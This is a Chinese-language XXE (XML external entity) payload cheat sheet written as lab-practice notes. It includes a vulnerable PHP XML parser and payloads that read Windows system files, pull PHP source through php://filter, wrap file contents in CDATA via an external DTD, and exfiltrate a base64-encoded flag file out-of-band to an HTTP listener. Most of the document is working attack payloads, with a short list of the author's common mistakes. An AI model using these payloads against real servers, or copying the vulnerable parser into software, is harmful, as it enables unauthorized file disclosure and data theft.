XXE_payload
<?php
$xmlfile = file_get_contents('php://input');
$creds=simplexml_load_string($xmlfile);
echo $creds;
?>
1 回顯的類型
1.1
POC:php
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [ <!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]> <creds>&goodies;</creds>
1.2
與1.1不同的是,引入的外部的dtdhtml
POC:python
********** post提交的數據: <?xml version="1.0"?> <!DOCTYPE creds SYSTEM "http://127.0.0.1/test/evil.dtd"> <creds>&b;</creds> ********** http://127.0.0.1/test/evil.dtd的數據 <!ENTITY b SYSTEM "file:///c:/windows/system.ini">
1.3
******** post: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [ <!ENTITY % goodies SYSTEM "http://127.0.0.1/test/evil.dtd"> %goodies; ]> <creds>&b;</creds> ******** evil.dtd <!ENTITY b SYSTEM "file:///c:/windows/system.ini">
1.4
<table><tr><td bgcolor=orange>當裏面含有<,&時候,上邊的方法用file協議讀不出文件</td></tr></table>git
1.41
若是是php的話,能夠用php的filter協議直接讀出文件github
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [ <!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]> <creds>&goodies;</creds>
1.42
<![CDATA["和 「]]> 拼接引用的內容,就能夠正常輸出 web
********** post提交的數據: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///C:/softeware/phpstudy/PHPTutorial/WWW/test/index.php"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://127.0.0.1/test/evil.dtd"> %dtd; ]> <roottag>&all;</roottag> ********* evil.dtd的內容 <?xml version="1.0" encoding="UTF-8"?> <!ENTITY all "%start;%goodies;%end;">
2 無回顯
2.1
********** post: <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1/test/evil.dtd"> %remote;%int;%send; ]> ********** evil.dtd的內容 <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/test/flag.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1:9999?p=%file;'>"> *********** python3 -m http.server 9999
3總結一下本身老出錯的地方
最後引用實體的時候,老忘了打分號。<creds>&goodies;</creds>windows
沒有回顯的時候,要注意用filter結合file的絕對路徑post
filter能夠不用絕對路徑,可是有時候你是訪問你的index.html,php文件不必定是index.php。spa
靶場練習;code
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 安裝cuda+cuDNN
- 2. GitHub的使用說明
- 3. phpDocumentor使用教程【安裝PHPDocumentor】
- 4. yarn run build報錯Component is not found in path 「npm/taro-ui/dist/weapp/components/rate/index「
- 5. 精講Haproxy搭建Web集羣
- 6. 安全測試基礎之MySQL
- 7. C/C++編程筆記:C語言中的複雜聲明分析,用實例帶你完全讀懂
- 8. Python3教程(1)----搭建Python環境
- 9. 李宏毅機器學習課程筆記2:Classification、Logistic Regression、Brief Introduction of Deep Learning
- 10. 阿里雲ECS配置速記
歡迎關注本站公眾號,獲取更多信息
